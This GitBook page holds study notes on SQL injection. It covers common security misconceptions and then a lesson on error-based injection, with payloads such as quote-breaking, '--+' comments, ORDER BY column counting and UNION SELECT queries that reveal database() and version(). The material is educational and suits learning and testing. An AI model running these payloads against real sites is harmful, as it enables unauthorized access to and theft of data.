Powered by GitBook

What is SQL injection?

SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for executive (e.g to dump the database contents to the attacker).

Security misconception

1) The firewall protects my web server and database.

Access to the server through ports 80 and 443 makes the web server part of your external perimeter defense.

Vulnerabilities in the web server software or applications may allow access to internal network resources.

2) The IDS protects my web server and database

The IDS is configured to detect signatures of various well-known attacks.

Attack signatures do not include those for attacks againt custom applications.

3) SSl secures my sites

SSL secures the transport of data between the web server and the user's browser.

SSL does not protect against the attacks against the server and applications.

SSL is the hackers best friend due to the false sense of security.

1) Attackers sends data containing SQL fragment

2) Application sends modified database information

3) Attacker views unauthorized data

SQL injections cannot be prevented from the firewall or IDS or SSL. You need to be very pierce when you write your code. The mistakes in the code are responbiles for SQL injection.

It is a flaw in "web application" development, it is not a DB or web server problem.

Most programmers are still not aware of this problem

A lot of the tutorials & demo "templates" are vulnerable

Even worse, a lot of solutions posted on the Internet are not good enough.

In our pen test over 60% of our clients turn out to be vulnerable to SQL injection.

Lesson 1 Notes - Error Based Injection (And why they are bad)

select uname, password from table where id = 'our-input'

select uname, password from table where id = '1'

The above will produce an error directly from the database instead of a 404 page not found. Which means you are already connected to the database and you can dump the database!

' and \ will break the current query and tell the database to execute your line of code to get the database to do something it wasn't desgined to do.

Our input will join the part of the query that we cannot modify. To join the query do:

' -- [space] will work but if it doesn't when you can do a URL space encoding of %20 with a final result of ' --%20

' --+ will work too

1' order by 1 --+ [UP TO] 1' order by 3 --+ [This means the number of columns in the database is 3]

' union all select 1,2,3 --+

Only the result of one query can be displayed on the page

-1' union all select 1,2,3 --+ [This will break the first query at the first 1]

-1' union all select 1,database(),3 --+ [This will show you the name of the database]

-1' union all select 1,database(),version() --+ [This will display the OS version]

results matching ""

No results matching ""